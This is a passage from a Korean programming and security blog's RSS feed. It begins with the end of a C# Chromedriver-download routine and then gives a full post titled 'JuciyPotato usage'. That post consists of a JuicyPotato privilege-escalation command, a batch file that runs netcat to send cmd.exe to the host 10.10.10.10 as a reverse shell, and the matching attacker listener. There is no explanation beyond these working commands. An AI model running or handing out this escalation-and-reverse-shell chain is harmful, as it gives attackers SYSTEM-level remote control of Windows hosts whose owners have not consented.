                    MessageBox.Show(&quot;Chromedriver를 정상 다운로드 할 수 없습니다.\n인터넷 연결 확인 후 재실행하거나 직접 다운로드가 필요합니다.\n프로그램 재실행 이후에도 지속적인 문제가 발생할 경우 개발자게에 문의주세요.&quot;, &quot;Error&quot;, MessageBoxButtons.OK, MessageBoxIcon.Error);
                }
            }
            if (File.Exists(zipFilePath)) { File.Delete(zipFilePath); }
            if (File.Exists(LICENSE_iFilePath)) { File.Delete(LICENSE_iFilePath); }

        }&lt;/code&gt;&lt;/pre&gt;</description>
      <category>공부/Programming</category>
      <author>a2sembly</author>
      <guid isPermaLink="true">https://a2sembly.tistory.com/61</guid>
      <comments>https://a2sembly.tistory.com/61#entry61comment</comments>
      <pubDate>Wed, 16 Aug 2023 16:37:05 +0900</pubDate>
    </item>
    <item>
      <title>JuciyPotato usage</title>
      <link>https://a2sembly.tistory.com/60</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot;&gt;- Victim&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot;&gt;jp.exe -t * -p C:\Users\12\Desktop\2312\r-shell.bat.bat -l 1337 &lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot;&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot;&gt;- shell.bat &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot;&gt;START C:\Users\12\Desktop\2312\nc.exe -e cmd.exe 10.10.10.10 1111 &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot;&gt;- Client&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot;&gt;nc -nlvp 1111&lt;/span&gt;&lt;/p&gt;</description>
      <category>공부/ETC</category>
      <author>a2sembly</author>
      <guid isPermaLink="true">https://a2sembly.tistory.com/60</guid>
      <comments>https://a2sembly.tistory.com/60#entry60comment</comments>
      <pubDate>Fri, 11 Aug 2023 14:36:26 +0900</pubDate>
    </item>
  </channel>
</rss>